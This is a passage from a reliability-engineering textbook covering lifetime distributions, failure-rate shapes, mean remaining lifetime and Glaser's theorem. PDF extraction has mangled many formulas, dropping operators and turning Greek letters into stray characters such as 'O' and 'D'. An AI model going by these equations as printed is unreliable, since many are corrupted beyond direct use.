‘better’ than one component in this case. This fact ~ suggests that there should be some equilibrium point t in (0, tc ) , where ~ m( t ) 1 / O1 . 2.3 Lifetime Distributions and Their Failure Rates There are many lifetime distributions used in reliability theory and in practice. In this section, we briefly discuss the important properties of several important lifetime distributions that we will use in this book. Complete information on the subject can be found in Johnson et al. (1994, 1995). A recent book by Marshall and Olkin (2007) also presents a thorough analysis of statistical distributions with an emphasis on reliability theory. 2.3.1 Exponential Distribution The exponential distribution (or negative exponential), owing to its simplicity and relevance in many applications, is still probably the most popular distribution in practical reliability analysis. Many engineering devices (especially electronic) have a constant failure rate O ! 0 during the usage period. The Cdf and the pdf of the exponential distribution are given by Pr[T d t ] 1  exp{O t} F (t ) and f (t ) O exp{O t} , respectively. The expected value and variance are respectively given by E[T ] 1 O , var(T ) 1 O2 The MRL function is also a constant, i.e., m (t ) { m E[T ] . . (2.19) 20 Failure Rate Modelling for Reliability and Risk The exponential distribution is the only distribution that possesses the memoryless property: F (t ), x, t t 0 , F (t | x) and therefore, it is the only non-trivial solution of the functional equation F (t  x) F (t ) F ( x) . As the failure rate O is constant, the items described by the exponential distribution do not age in the sense to be defined in Section 2.4.1. The exponential distribution has many characterizations (Marshall and Olkin, 2007). The simplest is via the constant failure rate. Another natural characterization is as follows: a distribution is exponential if and only if its mean remaining lifetime is a constant. The memoryless property can also be used as a characterization for this distribution. 2.3.2 Gamma Distribution Consider the sum of n i.i.d. exponential random variables: T X 1  X 2  ...  X n . The corresponding (n  1) -fold convolution of Cdf (2.19) with itself results in the following Cdf for this sum: n1 F (t ) 1  ¦ k 0 (O t ) k exp{Ot ) , k! (2.20) whereas the pdf is f (t ) Ont n 1 (n  1)! exp{Ot} . For n 1 , this distribution reduces to the exponential one. Therefore, (2.20) can be considered a generalization of the exponential distribution. The mean and variance are respectively n n E[T ] , var(T ) , 2 O O and the failure rate is given by the following equation: O (t ) On t n1 n 1 ¦ (n  1)! k 0 Ot k . (2.21) k! It can easily be seen from this formula that O (t ) ( O (0) tion asymptotically approaching O from below, i.e., 0 ) is an increasing func- Failure Rate and Mean Remaining Lifetime limt o f O (t ) 21 O. This distribution, which is a special case of the gamma distribution for integer n , is often called the Erlangian distribution. It plays an important role in reliability engineering. For example, the distribution function of the time to failure of a ‘cold’ standby system, where the lifetimes of components are exponentially distributed, follows this rule. As O (t ) increases, this system ages. 1 n=2 λ(t) 0.8 n=3 0.6 0.4 n=5 0.2 0 0 5 10 15 20 t 25 30 Figure 2.1. The failure rate of the Erlangian distribution ( O 35 40 1) We will use this graph for deterioration curve modelling in Chapter 5. The probability density function for a non-integer n , which for the sake of notation is denoted by D , is OD t D 1 f (t ) exp{Ot}, (2.22) *(D ) where the gamma function is defined in the usual way as f *(D ) ³u D 1 exp{u}du 0 and the scale parameter O and the shape parameter D are positive. For noninteger D , the corresponding Cdf does not have a ‘closed form’ as in the integer case (2.20). Equation (2.22) defines a standard two-parameter gamma distribution that is very popular in various applications. The gamma distribution naturally appears in statistical analyses as the distribution of the sum of squares of independent normal variables. 22 Failure Rate Modelling for Reliability and Risk It can be shown (Lai and Xie, 2006) that the failure rate of the gamma distribution can be represented in the following way: 1 O (t ) f D 1 § u· ¨1  ¸ t¹ 0© ³ exp{Ou}du . It follows from this equation that O (t ) is an increasing function for D t 1 and is decreasing for 0  D d 1 . When D 1 , we arrive at the exponential distribution, which has a failure rate ‘that is increasing and decreasing at the same time’. As we stated in the previous section, it follows from Equations (2.15) and (2.7) that for increasing (decreasing) O (t ) , the MRL function m(t ) is decreasing (increasing). This is a general fact, which means in the case of the gamma distribution that m(t ) is a decreasing function for D t 1 and is increasing for 0  D d 1 . Govil and Agraval (1983) have shown that m(t ) OD 1t D exp{Ot} D  t , O *(D ) F (t ) where F (t ) is the survival function for the gamma distribution. It can be verified by direct differentiation that the monotonicity properties of m(t ) defined by this equation comply with those obtained from general considerations. As the corresponding integrals can usually be calculated explicitly, the gamma distribution is often used in stochastic and statistical modelling. For example, it is a prime candidate for a mixing distribution in mixture models (Chapters 6 and 7). 2.3.3 Exponential Distribution with a Resilience Parameter The two-parameter distribution obtained from the exponential distribution by introducing a resilience parameter r has not received much attention in the literature (Marshall and Olkin, 2007). However, when r is an integer, similar to the Erlangian distribution, it plays an important role in reliability, as it defines the time-tofailure distribution of a parallel system of r exponentially distributed components. Therefore, the Cdf and the pdf are defined respectively as F (t ) f (t ) (1  exp{O t}) r , O , r ! 0 , Or exp{Ot}(1  exp{O t}) r 1 , O , r ! 0 . The failure rate is O (t ) Or exp{Ot}(1  exp{O t}) r 1 . 1  (1  exp{O t}) r (2.23) Failure Rate and Mean Remaining Lifetime 23 It is easy to show by direct computation that O (t ) is increasing for r ! 1 . Therefore, the described parallel system is ageing. Using L’Hospital’s rule, it can also be shown that for r ! 0 , lim t of O (t ) O, which, similar to the case of the Erlangian distribution, also follows from the definition of the failure rate as a conditional characteristic. Also: O (0) 0 for r ! 1 and O (t ) o f as t o 0 for 0  r  1 . 1 r=2 0.8 r=5 λ(t) 0.6 0.4 r = 10 0.2 0 0 1 2 3 4 5 t Figure 2.2. The failure rate of the exponential distribution ( O parameter 1 ) with a resilience 2.3.4 Weibull Distribution The Weibull distribution is one of the most popular distributions for modelling stochastic deterioration. It has been widely used in reliability analysis of ball bearings, engines, semiconductors, various mechanical devices and in modelling human mortality as well. It also appears as a limiting distribution for the smallest of a large number of the i.i.d. positive random variables. If, for example, a series system of n i.i.d. components is considered, then the time to failure of this system is asymptotically distributed ( n o f ) as the Weibull distribution. The monograph by Murthy et al. (2003) covers practically all topics on the theory and practical usage of this distribution. The standard two-parameter Weibull distribution is defined by the following survival function: F (t ) exp{(Ot )D }, O ,D ! 0 . (2.24) 24 Failure Rate Modelling for Reliability and Risk The failure rate is O (t ) DO (Ot )D 1 . (2.25) For D t 1 , it is an increasing function and therefore is suitable for deterioration modelling. When 0  D d 1 , this function is decreasing and can be used, e.g., for infant-mortality modelling. The corresponding expectation is given by m(0) 1 §1 · *¨  1¸ . O ©D ¹ In general, m(t ) has a rather complex form, but for some specific cases (Lai and Xie, 2006) it can be reasonably simple. On the other hand, as O (t ) is monotone, m(t ) is also monotone: it is increasing for 0  D d 1 and is decreasing for D t 1 . 2.3.5 Pareto Distribution The Pareto distribution can be viewed as another interesting generalization of the exponential distribution. We will derive it using mixtures of distributions, which is a topic of Chapters 6 and 7 of this book. Therefore, the following can be considered as a meaningful example illustrating the operation of mixing. Assume that the failure rate in (2.19) is random, i.e., O Z, where Z is a gamma-distributed random variable with parameters D (shape) and E (scale). When considering mixing distributions, we will usually use the notation E for the scale parameter and not O as in (2.23). Thus, if Z z , the pdf of the random variable T is given by z ) { f (t , z ) f (t | Z z exp{ zt} . Denote the pdf of Z by S ( z ) . The marginal (or observed) pdf of T is f f (t ) ³ f (t, z )S ( z )dz 0 DE D ( E  t )D 1 and the corresponding survival function is given by D F (t ) § t · ¨¨1  ¸¸ , D , E ! 0 . E ¹ © (2.26) Equation (2.26) defines the Pareto distribution of the second kind (the Lomax distribution) for t t 0 . Note that the survival function of the Pareto distribution of the first kind is usually given by F (t ) t  c , where c ! 0 is the corresponding shape Failure Rate and Mean Remaining Lifetime 25 parameter. Therefore, this distribution has a support in [1, f) , whereas (2.26) is defined in [0, f) , which is usually more convenient in applications. The failure rate is given by a very simple relationship: f (t ) F (t ) O (t ) D (E  t ) , (2.27) which is a decreasing function. Therefore, the MRL function m(t ) is increasing. Oakes and Dasu (1990) show that it can be a linear function for some specific values of parameters D and E . The expectation is m(0) E D 1 , D ! 1. Unlike exponentially decreasing functions, survival function (2.26) is a ‘slowly decreasing’ function. This property makes the Pareto distribution useful for modelling of extreme events. 2.3.6 Lognormal Distribution The most popular statistical distribution is the normal distribution. However, it is not a lifetime distribution, as its support is ( f,f) . Therefore, usually two ‘modifications’ of the normal distribution are considered in practice for positive random variables: the lognormal distribution and the truncated normal distribution. A random variable T t 0 follows the lognormal distribution if Y ln T is normally distributed. Therefore, we assume that Y is N (D ,V 2 ) , where D and V 2 are the mean and the variance of Y , respectively. The Cdf in this case is given by F (t ) ­ ln t  D ½ )® ¾, t t 0 , ¯ V ¿ (2.28) where, as usual, ) (˜) denotes the standard normal distribution function. The pdf is given by f (t ) ­ (ln t  D ) 2 ½ exp® ¾ 2V 2 ¿ ¯ , (t 2S V ) and it can be shown (Lai and Xie, 2006) that the failure rate is O (t ) ­ (ln a t ) 2 ½ exp® ¾ 2V 2 ¿ 1 ¯ , a { exp{D } . t 2S V 1  ) ­ ln a t ½ ® ¾ ¯ V ¿ (2.29) 26 Failure Rate Modelling for Reliability and Risk The expected value of T is ­ V2½ exp®D  ¾. 2 ¿ ¯ m(0) The MRL function for this distribution will be discussed in the next section. The shape of the failure rate for D 0 is illustrated by Figure 2.3. Sweet (1990) showed that the failure rate has the upside-down bathtub shape (see the next section) and that limt o f O (t ) 0 , lim t o0 O (t ) 0 . It is worth noting that, along with the Weibull distribution, the lognormal distribution is often used for fatigue analysis, although it models different dynamics of deterioration than the dynamics described by the Weibull law. It is also considered as a good candidate for modelling the repair time in engineering systems. 2 σ = 0.5 λ(t) 1.5 1 σ =0.75 0.5 σ =1 0 0 1 2 3 4 t Figure 2.3. The failure rate of the lognormal distribution 2.3.7 Truncated Normal Distribution The density of the truncated normal distribution is given by f (t ) ­ (t  P ) 2 ½ c exp® ¾, V ! 0,  f  P  f, t t 0 , 2V 2 ¿ ¯ where c 1 2SV 2 1 . )(P / V ) The corresponding failure rate then follows as 5 Failure Rate and Mean Remaining Lifetime O (t ) 27 1 ­ (t  P ) 2 ½ § § t  P ·· ¨¨1  )¨ ¸ ¸¸ exp® ¾. 2V 2 ¿ © V ¹¹ 2SV 2 © ¯ 1 It can be shown that this failure rate is increasing and asymptotically approaches the straight line, as defined by (Navarro and Hernandez, 2004): lim t of O (t ) V 2 . If P  3V !! 0 , then the truncated normal distribution practically coincides for t t 0 with the corresponding standard normal distribution, which is known to have an increasing failure rate. 2.3.8 Inverse Gaussian Distribution This distribution is popular in reliability, as it defines the first passage time probability for the Wiener process with drift. Although realizations of this process are not monotone, it is widely used for modelling deterioration. The distribution function of the inverse Gaussian distribution is defined by the following equation: F (t ) ­° O § t ·½° ·½° ­ 2O ½ ­° O§ t ¨¨  1¸¸¾  exp® ¾) ® ¨¨  1¸¸¾, t t 0 , )® t ©P °¯ t © P ¯ P ¿ °¯ ¹°¿ ¹°¿ (2.30) where O and P are parameters. The pdf of the inverse Gaussian distribution is ½ ­ O O exp® (t  P ) 2 ¾ . 3 2 2S t ¿ ¯ 2P t f (t ) The mean and the variance are respectively E[T ] P , var(T ) P3 . O We will show in Section 2.4 that its failure rate has an upside-down bathtub shape. The MRL function will also be analysed. 2.3.9 Gompertz and Makeham–Gompertz Distributions These distributions have their origin in demography and describe the mortality of human populations. Gompertz (1825) was the first to suggest the following exponential form for the mortality (failure) rate of humans (see Chapter 10 for more details): O (t ) a exp{bt}, a, b ! 0 . (2.31) 28 Failure Rate Modelling for Reliability and Risk The data on human mortality in various populations are in good agreement with this curve. In Section 10.1, we will present a simple original ‘justification’ of this model, but in fact, there is no suitable biological explanation of exponentiality in (2.31) so far. Therefore, this distribution should only be considered as an empirical law. Note that this is the first distribution in this section that is defined directly via the failure (mortality) rate. The corresponding survival function is F (t ) ­° t ½° exp® ³ O (u )du ¾ °¯ 0 °¿ ½ ­ a exp® (exp{bt}  1)¾ . ¿ ¯ b (2.32) The mortality rate (2.31) is increasing, therefore the corresponding MRL function is decreasing. The Makeham–Gompertz distribution is a slight generalization of (2.32). It takes into account the initial period, where the mortality is approximately constant and is mostly due to external causes (accidents, suicides, etc.). This distribution was also defined in Makeham (1867) directly via the mortality rate, although the equation-based explanation was also provided by this author (Chapter 10): O (t ) A  a exp{bt}, A, a, b ! 0 . The corresponding survival function in this case is F (t ) a ½ ­ exp® At  (exp{bt}  1¾ . b ¿ ¯ (2.33) Both of these distributions are still widely used in demography. Numerous generalizations and alterations have been suggested in the literature and applied in practice. 2.4 Shape of the Failure Rate and the MRL Function 2.4.1 Some Definitions and Notation Understanding the shape of the failure rate is important in reliability, risk analysis and other disciplines. The conditional probability of failure in (t , t  dt ] describes the ageing properties of the corresponding distributions, which are crucial for modelling in many applications. A qualitative description of the monotonicity properties of the failure rate can be very helpful in the stochastic analysis of failures, deaths, disasters, etc. As the failure rate of the exponential distribution is constant (as is the corresponding MRL function), this distribution describes stochastically non-ageing lifetimes. Survival and failure data are frequently modelled by monotone failure rates. This may be inappropriate when, e.g., the course of a disease is such that the mortality reaches a peak after some finite interval of time and then declines (Gupta, 2001). In such a case, the failure rate has an upside-down bathtub shape and the Failure Rate and Mean Remaining Lifetime 29 data should be analysed with the help of, e.g., lognormal or inverse Gaussian distributions. On the other hand, many engineering devices possess a period of ‘infant mortality’ when the failure rate declines in an initial time interval, reaches a minimum and then increases. In such a case, the failure rate has a bathtub shape and can be modelled, e.g., by mixtures of distributions. Navarro and Hernandez (2004) show how to obtain the bathtub-shaped failure rates from the mixtures of truncated normal distributions. Many other relevant examples can be found in Section 2.8 of Lai and Xie (2006) and in references therein. We will consider in this section only some basic facts, which will be helpful for obtaining and discussing the results in the rest of this book. Most often, the Cdf and the failure rate of a lifetime are modelled or estimated only on the basis of the corresponding failures (deaths). However, one can also use information (if available) on the process of a ‘failure development’. If, e.g., a failure occurs when the accumulated random damage or wear exceeds a predetermined level, then the failure rate can be derived analytically for some simple stochastic processes of wear. The shape of the failure rate in this case can also be analysed using properties of underlying stochastic processes (Aalen and Gjeissing, 2001). These underlying processes are largely unknown. However, this does not imply that they should be ignored. Some simple models of this kind will be discussed in Chapter 10. As we saw in the previous section, many popular parametric lifetime models are described by monotone failure rates. If O (t ) increases (decreases) in time, then we say that the corresponding distribution belongs to the increasing (decreasing) failure rate (IFR (DFR)) class. These are the simplest nonparametric classes of ageing distributions. A natural generalization on the non-monotone failure rates is when t ³ O (u)du 0 t (2.34) is increasing (decreasing) in t . These classes are called IFRA (DFRA), where “A” stands for “average”. We say that the Cdf F (x) belongs to the decreasing (increasing) mean remaining lifetime (DMRL (IMRL)) class if the corresponding MRL function m(t ) is decreasing (increasing). These classes are in some way dual to IFR (DFR) classes. See Section 3.3.2 for formal definitions of IFR (DFR) and DMRL (IMRL) classes. The Cdf F (x) is said to be new better (worse) than used (NBU (NWU)) if F ( x | t ) d (t) F ( x), x, t t 0 . (2.35) This definition means that an item of age t has a stochastically smaller (larger) remaining lifetime (Definition 3.4) than a new item at age t 0 . The described classes will usually be sufficient for presentation in this book. Each of them has a clear, simple ‘physical’ meaning describing some kind of deterioration. A variety of other ageing classes of distributions can be found in the literature (Barlow and Proschan, 1975; Rausand and Hoyland, 2004; Lai and Xie, 2006; Marshall and Olkin, 2007, to name a few). Many of them do not have this clear interpretation and are of mathematical interest only. 30 Failure Rate Modelling for Reliability and Risk Note that IFR (DFR) and DMRL (IMRL) classes are defined directly by the shape of the failure rate and the MRL function, respectively. If O (t ) is monotonically (strictly) increasing (decreasing) in time, we say that it is I (D) shaped and for brevity write O (t )  I (D). A similar notation will be used for the DMRL (IMRL) classes, i.e., m(t )  D (I). Figure 1.1 of Chapter 1 gives an illustration of the bathtub shape of a failure rate with a useful period, where it is approximately constant. This can be the case in practical life-cycle applications, but formally we will define the bathtub shape without a useful period plateau of this kind. Definition 2.3. The differentiable failure rate O (t ) has a bathtub shape if O c(t )  0 for t  [0, t0 ) , O c(t0 ) 0 , O c(t ) ! 0 for t  (t0 , f) , and it has an upside-down bathtub shape if O c(t ) ! 0 for t  [0, t0 ) , O c(t0 ) 0 , O c(t )  0 for t  (t0 , f) . Ȝ(t) t Figure 2.4. The BT and the UBT shapes of the failure rate We will use the notation O (t )  BT and O (t )  UBT, respectively. There can be modifications and generalizations of these shapes (e.g., when there is more than one minimum or maximum for the function O (t ) ), but for simplicity, only BT and UBT shapes will be considered. 2.4.2 Glaser’s Approach As we have already stated, the lognormal and the inverse Gaussian distributions have a UBT failure rate. We will see in Chapter 6 that many mixing models with Failure Rate and Mean Remaining Lifetime 31 an increasing baseline failure rate result in a UBT shape of the mixture (observed) failure rate. For example, mixing in a family of increasing (as a power function) failure rates (the Weibull law) ‘produces’ the UBT shape of the observed failure rate. From this point of view, the BT shape is ‘less natural’ and often results as a combination of different standard distributions defined for different time intervals. For example, infant mortality in [0, t0 ] is usually described by some DFR distribution in this interval, whereas the wear-out in (t0 , f) is modelled by an IFR distribution. However, mixing of specific distributions can also result in the BT shape of the failure rate as, e.g., in Navarro and Fernandez (2004). Note that the infant mortality curve can also be explained via the concept of mixing, as, e.g., mixtures of exponential distributions are always DFR (Chapter 6). The function K (t )  f c(t ) f (t ) (2.36) appears to be extremely helpful in the study of the shape of the failure rate O (t ) f (t ) / F (t ) . This function contains useful information about O (t ) and is simpler because it does not involve F (t ) . In particular, the shape of K (t ) often defines the shape of O (t ) (Gupta, 2001). Assume that the pdf f (t ) is a twice differentiable, positive function in (0, f) . Define a function g (t ) as the reciprocal of the failure rate, i.e., g (t ) F (t ) . f (t ) (2.37) g (t )K (t )  1 , (2.38) 1 O (t ) Then g c(t ) which means that the turning point of O (t ) is the solution of the equation O (t ) K (t ) (compare with Equation (2.9)). It can also be verified that (Gupta, 2001) lim t of O (t ) lim t of K (t ) . Using Equations (2.37) and (2.38): f g c(t ) ª f ( y) º ³ «¬ f (t ) »¼K (t )dy  1 t f f ª f ( y) º ª f ( y) º ³t «¬ f (t ) »¼ [K (t )  K ( y)]dy  ³t «¬ f (t ) »¼ K ( y)dy  1 . Taking into account that 32 Failure Rate Modelling for Reliability and Risk f ª f ( y) º ³t «¬ f (t ) »¼ K ( y)dy f  1 f c( y )dy 1 , f (t ) ³t we arrive eventually at f g c(t ) ª f ( y) º ³ «¬ f (t ) »¼ [K (t )  K ( y)]dy . (2.39) t Using (2.39) as a supplementary result, we are now able to prove Glaser’s theorem, which is crucial for the analysis of the shape of the failure rate function (Glaser, 1980). Theorem 2.3. x If K (t )  I, then also O (t )  I; x x If K (t )  D, then also O (t )  D; If K (t )  BT and there exists y0 such that g c( y0 ) 0 , then O (t )  BT, otherwise O (t )  I; If K (t )  UBT and there exists y0 such that g c( y0 ) 0 , then O (t )  UBT, otherwise O (t )  D. x Proof. If K (t )  I, then g c(t ) , as follows from Equation (2.39), is negative for all t ! 0 . Therefore, g (t )  D and O (t )  I. The proof of the second statement is similar. Let us prove the first part of the third statement. This proof follows the original proof in Glaser (1980). Another proof, which is obtained using more general considerations, can be found in Marshall and Olkin (2007). It follows from the definition of the BT shape that K (t )  BT if K c(t )  0 for t  [0, t0 ) , K c(t0 ) 0 , K c(t ) ! 0 for t  (t0 , f) . (2.40) Assume that g cc( y0 )  0 . Since g c( y0 ) 0 in accordance with the conditions of the theorem, it follows from the differentiation of (2.38) that g cc( y0 ) g ( y0 )K c( y0 ) . Therefore, g cc( y0 )  0 œ K c( y0 )  0 œ y0  t0 . Thus, if our assumption is true, then y0  t0 . Suppose the opposite: y0 t t0 . From Equations (2.39) and (2.40) it follows that g c(t )  0 for t t t0 . Therefore, g c( y0 )  0 , which contradicts the condition of the theorem stating that g c( y0 ) 0 . Hence y0  t0 and g cc( y0 )  0 . On the other hand, it is clear that y y0 is the only root of equation g c( y ) 0 and that g (t ) attains its maximum at this point. The proof of the second part is simpler: indeed, either g c(t ) ! 0 for all t ! 0 or g c(t )  0 . It follows from Equation (2.39) that g c(t )  0 for all t t t0 . Therefore, g c(t )  0 for all t ! 0 and O (t )  I. Failure Rate and Mean Remaining Lifetime 33 Ŷ The proof of the last statement is similar. This important theorem states that the monotonicity properties of O (t ) are defined by those of K (t ) , and because K (t ) is often much simpler than O (t ) , its analysis is more convenient. The simplest meaningful example is the standard normal distribution. Although it is not a lifetime distribution, the application of Glaser’s theorem is very impressive in this case. Indeed, the failure rate of the normal distribution does not have an explicit expression, whereas the function K (t ) , as can be easily verified, is very simple: K (t ) (t  P ) / V 2 . Therefore, as K (t )  I, the failure rate is also increasing, which is a well-known fact for the normal distribution. Note that Gupta and Warren (2001) generalized Glaser’s theorem to the case where O (t ) has two or more turning points. Example 2.2 Failure Rate Shape of the Truncated Normal Distribution The function K (t ) in this case is the same as for the normal distribution, and therefore the failure rate is also increasing. Navarro and Hernandez (2004) also show that O (t ) ! (t  P ) / V 2 , t t 0 . Example 2.3 Failure Rate Shapes of Lognormal and Inverse Gaussian Distributions The function K (t ) for the lognormal distribution is K (t )  f c(t ) f (t ) 1 V 2t (V 2  ln t  D ) . (2.41) It can be shown that n(t )  UBT (Lai and Xie, 2006) and that the second condition in the last statement of Theorem 2.3 is also satisfied, since, in accordance with Equation (2.29), limt o 0 O (t ) 0 , limt o f O (t ) 0. Therefore, O (t )  UBT, and this is illustrated by Figure 2.2. The K (t ) function for the inverse Gaussian distribution (2.30) is K (t ) 3P 2t  O (t 2  P 2 ) . 2 P 2t 2 (2.42) Using arguments similar to those used in the case of the lognormal distribution, it can be shown (Lai and Xie, 2006) that O (t )  UBT. The exact MRL function for this distribution (Gupta, 2001) is very cumbersome to derive. 34 Failure Rate Modelling for Reliability and Risk Glaser’s approach was generalized by Block et al. (2002) by considering the ratio of two functions N (t ) G (t ) , (2.43) D (t ) where the functions on the right-hand side are continuously differentiable and D (t ) is positive and strictly monotone. As with (2.36), where the numerator is the derivative of f (t ) and the denominator is the derivative of F (t ) , we define the function K (t ) as N c(t ) K (t ) . (2.44) Dc(t ) These authors show that the monotonicity properties of G (t ) are ‘close’ to those of K (t ) , as in the case where K (t ) is defined by (2.36). Consider, for example, the MRL function f ³ F (u)du m(t ) t F (t ) . We can use it as G (t ) . It is remarkable that K (t ) in this case is simply the reciprocal of the failure rate, i.e., K (t ) F (t ) f (t ) 1 . O (t ) Therefore, the functions m(t ) and 1 / O (t ) can be close in some suitable sense; this will be discussed in Section 2.4.3. Glaser’s theorem defines sufficient conditions for monotonic or BT (UBT) shapes of the failure rate. The next three theorems establish relationships between the shapes of O (t ) and m(t ) . The first one is obvious and in fact has already been used several times. Theorem 2.4. If O (t )  I (or (O (t ) 1  D ), then m(t )  D . Proof. The result follows immediately from Equations (2.7) and (2.15). The symmetrical result is also evident: if O (t )  D, then m(t )  I. Ŷ Thus, a monotone failure rate always corresponds to a monotone MRL function. The inverse is true only under additional conditions. Theorem 2.5. Let the MRL function m(t ) be twice differentiable and the failure rate O (t ) be differentiable in (0, f) . If m(t )  D (I) and is a convex (concave) function, then O (t )  I (D). Failure Rate and Mean Remaining Lifetime 35 Proof. Differentiation of both sides of Equation (2.9) gives mcc(t ) mc(t )O (t )  m(t )O c(t ) . If m(t ) is strictly decreasing, then its derivative is negative for all t  (0, f) . Owing to convexity defined by mcc(t ) t 0 and taking into account that the functions O (t ) and m(t ) are positive in (0, f) , O c(t ) should be positive as well. This means Ŷ that O (t )  I. The ‘symmetrical’ result is proved in a similar way. Gupta and Kirmani (2000) state that if O (t ) is concave, then m(t ) is a convex function. Theorem 2.5 gives the sufficient conditions for the monotonicity of the failure rate in terms of the monotonicity of m(t ) . The following theorem generalizes the foregoing results to a non-monotone case (Gupta and Akman, 1995; Mi, 1995; Finkelstein, 2002a). It states that the BT (UBT) failure rate under certain assumptions can correspond to a monotone MRL function (compare with Theorem 2.4, which gives a simpler correspondence rule). Theorem 2.6. Let O (t ) be a differentiable BT failure rate in [0, f). x x If mc(0) O (0)m(0)  1 d 0 , then m(t )  D; If mc(0) ! 0 , then m(t )  UBT. (2.45) Let O (t ) be a differentiable UBT failure rate in [0, f). x If mc(0) t 0 , then m(t )  I; x If mc(0)  0 , then m(t )  BT. Proof. We will prove only the first statement. Other results follow in the same manner. Denote the numerator in (2.9) by d (t ) , i.e., f d (t ) O (t ) ³ F (u )du  F (t ) . (2.46) t The sign of d (t ) in (2.9) defines the sign of mc(t ) . On the other hand, f d c(t ) O c(t ) ³ F (u )du , (2.47) t and the monotonicity properties of O (t ) are the same as for d (t ) . Recall that t0 is the change (turning) point for the BT failure rate. Therefore, O c(t0 ) d c(t0 ) 0 ; O (t ) ! O (t0 ) for t ! t0 and 36 Failure Rate Modelling for Reliability and Risk f d (t 0 ) O (t 0 ) ³ F (u )du F (t 0 ) tb f ³  O (u ) F (u )du F (t0 ) 0. (2.48) tb Owing to the assumption mc(0) d 0 and to Equation (2.9), the function d (t ) is negative at t 0 . It then follows from (2.47) that d (t ) decreases to d (t0 ) and then increases in (t0 , f) , being negative. The latter can be seen from Inequality (2.48), where t0 can be substituted by any t ! t0 . Therefore, in accordance with (2.9), mc(t )  0 in (0, f) , which completes the proof. Ŷ Corollary 2.1. Let O (0) 0 . If O (t ) is a differentiable UBT failure rate, then m(t ) has a bathtub shape. Proof. This statement immediately follows from Theorem 2.6, as Equation (2.45) reads mc(0) O (0)m(0)  1 1 d 0 in this case. Ŷ Example 2.4 (Gupta and Akman, 1995) Consider a lifetime distribution with O (t )  BT, t  [0, f) of the following specific form: (1  2.3t 2 )  4.6t O (t ) . 1  2.3t 2 It can easily be obtained using Equation (2.22) that the corresponding MRL is 1 , 1  2.3t 2 m(t ) which is a decreasing function. Obviously, the condition O (0) d 1 / m(0) is satisfied. 2.4.3 Limiting Behaviour of the Failure Rate and the MRL Function In this section, we will discuss and compare the simplest asymptotic (as t o f ) properties of O (t ) and 1 / m(t ) . When a lifetime T has an exponential distribution, these functions are equal to the same constant. It has already been mentioned that Block et al. (2001) stated that the monotonicity properties of the function G (t ) defined by Equation (2.43) are ‘close’ to those of the function K (t ) defined by Equation (2.44). When we choose G (t ) m(t ), the function K (t ) is equal to 1 / O (t ) , and therefore the monotonicity properties of these functions are similar. Moreover, we will show now that they are asymptotically equivalent. Denote r (t ) { 1 / m(t ) and, as in Finkelstein (2002a), rewrite Equation (2.10) in form that connects the failure rate and the reciprocal of the MRL function O (t )  r c(t )  r (t ). r (t ) (2.49) Failure Rate and Mean Remaining Lifetime 37 The following obvious result is a direct consequence of Equation (2.49). Theorem 2.7. Let lim t of r (t ) c, 0  c d f . Then r (t ) is asymptotically equivalent to O (t ) in the following sense: limt o f O (t )  r (t ) 0, (2.50) if and only if r c(t ) r (t ) mc(t ) o 0 as t o f . m(t ) (2.51) Let, e.g., r (t ) t E ; E ! 0 . Then Theorem 2.7 holds and the reciprocal of the MRL function for the Weibull distribution with an increasing failure rate can be approximated as t o f by this failure rate. The exact formula for the MRL function in this case is rather cumbersome, and thus this result can be helpful for asymptotic analysis. Note that Relationship (2.51) does not hold for sharply increasing functions r (t ) , such as, e.g., r (t ) exp{t} or r (t ) exp{t 2 } . Remark 2.2 Applying L’Hopital’s rule to the right-hand side of (2.7), the following asymptotic relation can be obtained (Calabra and Pulchini, 1987; Bradley and Gupta, 2003): 1 , limt o f m(t ) lim t o f O (t ) provided the latter limit exists and is finite. It is clear that this statement differs from the stronger one (2.50) only when lim t of O (t ) f . The asymptotic equivalence in (2.50) is a very strong one, especially when limt o f r (t ) f and lim t of O (t ) f . Therefore, it is reasonable to consider the following relative distance between O (t ) and r (t ) : | O (t )  r (t ) | r (t ) mc(t ) . This distance tends to zero when lim t of | mc(t ) | lim t of r c(t ) r 2 (t ) 0, (2.52) which, in fact, is equivalent to the following asymptotic relationship: O (t ) r (t )(1  o(1)) as t o f , (2.53) where, as usual, the notation o(1) means limt o f o(1) 0 . Asymptotic relationships of this kind are also often written as O (t ) ~ r (t ) , meaning that 38 Failure Rate Modelling for Reliability and Risk lim t of r (t ) O (t ) 1. (2.54) We will use both types of asymptotic notation. It can easily be verified that | mc(t ) |o 0 , e.g., for functions r (t ) exp{t} or r (t ) exp{t 2 } , for which (2.51) does not hold. When limt o f r (t ) 0 (limt o f m(t ) f) , which corresponds to O (t ) o 0 as t o f , the reasoning should be slightly different. Relationships (2.50) and (2.52) do not make much sense in this case. Therefore, the corresponding reciprocal values should be considered. From Equation (2.10): m(t ) mc(t )  1 1 O (t ) and 1 O (t )  m(t )  mc(t )m(t ) . mc(t )  1 The relative distance in this case is 1 O (t )m(t ) 1  mc(t ) . mc(t )  1 Therefore, Relationship (2.52) is also valid if limt o f | mc(t ) | 0 . Example 2.5 (Bradley and Gupta, 2003) Consider the linear MRL function m(t ) a  bt , a, b ! 0 . The corresponding failure rate is O (t ) 1 b . a  bt Thus, Condition (2.52) is not satisfied, and therefore (2.53) does not hold. Remark 2.3 Assume that r (t ) is ultimately (i.e., for large t ) increasing. It is easy to see from (2.49) that O (t ) is also ultimately increasing if r c(t ) / r (t ) is ultimately decreasing, which holds, e.g., for the power law. Many of the standard distributions have failure rates that are polynomials or ratios of polynomials. The same is true for the MRL function. Theorem 2.7 can be generalized to these rather general classes of functions by assuming that r (t ) is a regularly varying function (Bingham et al., 1987). A regularly varying function is defined as a function with the following structure: Failure Rate and Mean Remaining Lifetime r (t ) 39 t E l (t )(1  o(1)) , t o f ; f  E  f , E z 0 , where l (t ) is a slowly varying function: l (kt ) / l (t ) o 1 for all k ! 0 . Therefore, as t o f , it is asymptotically equivalent to the product of a power function and a function, which, e.g., increases slower than any increasing power function (for example, ln t ) . Theorem 2.8. Let the function r (t ) in Theorem 2.7 be a regularly varying function with E ! 0 . Assume that r c(t ) is ultimately monotone. Then Relationship (2.51) holds, and therefore (2.50) is also true. Proof (Finkelstein, 2002a). In accordance with the Monotone Density Theorem (Bingham et al., 1987), the ultimately monotone r c(t ) can be written in the following way: ~ r c(t ) t E 1l (t )(1  o(1)) as t o f , ~ where l (t ) is a slowly varying function. Using expressions for regularly varying r (t ) and r c(t ) : r c(t ) r (t ) t 1lˆ(t )(1  o(1)) as t o f , where lˆ(t ) is another slowly varying function. Owing to the definition of the slowly varying function, t 1lˆ(t ) o 0 as t o f , and therefore Relationship (2.51) holds. 2.5 Reversed Failure Rate 2.5.1 Definitions As 